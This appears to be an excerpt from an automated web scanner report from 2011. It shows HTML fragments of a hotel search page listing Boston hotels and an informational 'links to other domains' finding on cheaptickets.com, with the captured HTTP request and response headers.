<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />
<span class="hideme">
...[SNIP]...
r&gt;" href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X2">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="The Liberty Hotel, A Luxury Collection Hotel" style="top: -88px;" />

</a>
...[SNIP]...
<a href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X2"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
/us/courtyard-boston-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X3">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Courtyard Boston Logan Airport" style="top: -176px;" />

</a>
...[SNIP]...
/hotel/us/courtyard-boston-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X3"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
t;" href="/hotel/us/copley-mariott.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X4">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Boston Marriott Copley Place" style="top: -264px;" />

</a>
...[SNIP]...
<a href="/hotel/us/copley-mariott.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X4"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
ef="/hotel/us/hilton-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X5">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Hilton Boston Logan Airport" style="top: -352px;" />

</a>
...[SNIP]...
<a href="/hotel/us/hilton-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X5"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
br&gt;" href="/hotel/us/harborside.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X6">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Harborside Inn" style="top: -440px;" />

</a>
...[SNIP]...
<a href="/hotel/us/harborside.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X6"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
/hotel/us/mandarin-oriental-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X7">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Mandarin Oriental Boston" style="top: -528px;" />

</a>
...[SNIP]...
href="/hotel/us/mandarin-oriental-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X7"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
ref="/hotel/us/westin-copley-place.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X8">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Westin Copley Place" style="top: -616px;" />

</a>
...[SNIP]...
<a href="/hotel/us/westin-copley-place.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X8"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/r-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X9">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Ramada Boston" style="top: -704px;" />

</a>
...[SNIP]...
href="/hotel/us/r-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X9"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
hotel/us/best-western-terrace-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X10">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Best Western Terrace Inn Boston" style="top: -792px;" />

</a>
...[SNIP]...
ref="/hotel/us/best-western-terrace-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X10"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
&gt;" href="/hotel/us/days-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X11">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Days Hotel Boston" style="top: -880px;" />

</a>
...[SNIP]...
<a href="/hotel/us/days-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X11"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/the-berkeley-residence.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X12">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="40 Berkeley" style="top: -968px;" />

</a>
...[SNIP]...
href="/hotel/us/the-berkeley-residence.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X12"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max3 jq_tooltip" width="43" height="10" title="Max people: 3" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />
<span class="hideme">
...[SNIP]...
otel/us/c-i-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X13">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Comfort Inn Boston" style="top: -1056px;" />

</a>
...[SNIP]...
ef="/hotel/us/c-i-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X13"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
tel/us/hilton-boston-fin-district.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X14">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Hilton Boston Financial District" style="top: -1144px;" />

</a>
...[SNIP]...
f="/hotel/us/hilton-boston-fin-district.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X14"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
tel/us/boston-marriott-long-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X15">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Boston Marriott Long Wharf" style="top: -1232px;" />

</a>
...[SNIP]...
f="/hotel/us/boston-marriott-long-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X15"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
ref="/hotel/us/the-farrington-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X16">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="The Farrington Inn" style="top: -1320px;" />

</a>
...[SNIP]...
<a href="/hotel/us/the-farrington-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X16"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max1 jq_tooltip" width="43" height="10" title="Max people: 1" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max3 jq_tooltip" width="43" height="10" title="Max people: 3" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/renaissance-waterfront.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X17">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Renaissance Waterfront Hotel" style="top: -1408px;" />

</a>
...[SNIP]...
href="/hotel/us/renaissance-waterfront.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X17"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/fairmont-battery-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X18">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Fairmont Battery Wharf" style="top: -1496px;" />

</a>
...[SNIP]...
href="/hotel/us/fairmont-battery-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X18"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
;br&gt;" href="/hotel/us/w-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X19">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="W Boston" style="top: -1584px;" />

</a>
...[SNIP]...
<a href="/hotel/us/w-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X19"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
us/hosteling-international-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X20">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Hostelling International Boston" style="top: -1672px;" />

</a>
...[SNIP]...
hotel/us/hosteling-international-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X20"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max1 jq_tooltip" width="43" height="10" title="Max people: 1" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max1 jq_tooltip" width="43" height="10" title="Max people: 1" alt="" />
<span class="hideme">
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<img src="http://s.bstatic.com/static/img/marker-hotel-blue.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-hotel-grey.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport-large.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-city.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>
...[SNIP]...
19.184. http://www.cheaptickets.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
<meta name="robots" content="NOINDEX,FOLLOW" />
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/CTIX/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/CTIX/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.cheaptickets.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/CTIX/brandImages/headerLogo/logo-1.gif" alt="CheapTickets" height="43" width="213" class="logo" />
    </a>
...[SNIP]...
<a href="http://www.cheaptickets.com/App/PrepareDealsHome" class="deals link"> <img src="http://www.tnetnoc.com/siteImages/CTIX/brandImages/deals/dealsLogo-1.png" alt="Cheap of the week" height="58" width="158" />
    </a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/CTIX/banners/hotel/results/telesales/CTIX_Telesales_StalkBar-1.png" alt="Call us to book 1-800-733-1680" height="58" width="160" />
    </div>
...[SNIP]...
/App/PerformMDLPDealsContent?deal_id=fees-slashed&cnt=OVI&type=dm_ht" class="link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow&#034;
       
   }" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/CTIX/banners/hotel/searchBar/marketing/CTIX_Hotel_Marketing_Banner-1.png" alt="" height="30" width="960" class="searchBarBanner" />
    </a>
...[SNIP]...
earch&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot&hsv.page=1&hsv.location=11231" class="resetLocation link" delegatedtracking="true"> <img src="http://www.tnetnoc.com/siteImages/CTIX/icons/process/remove/extraSmall/extraSmall-1.png" alt="Remove" height="9" width="9" />
    </a>
...[SNIP]...
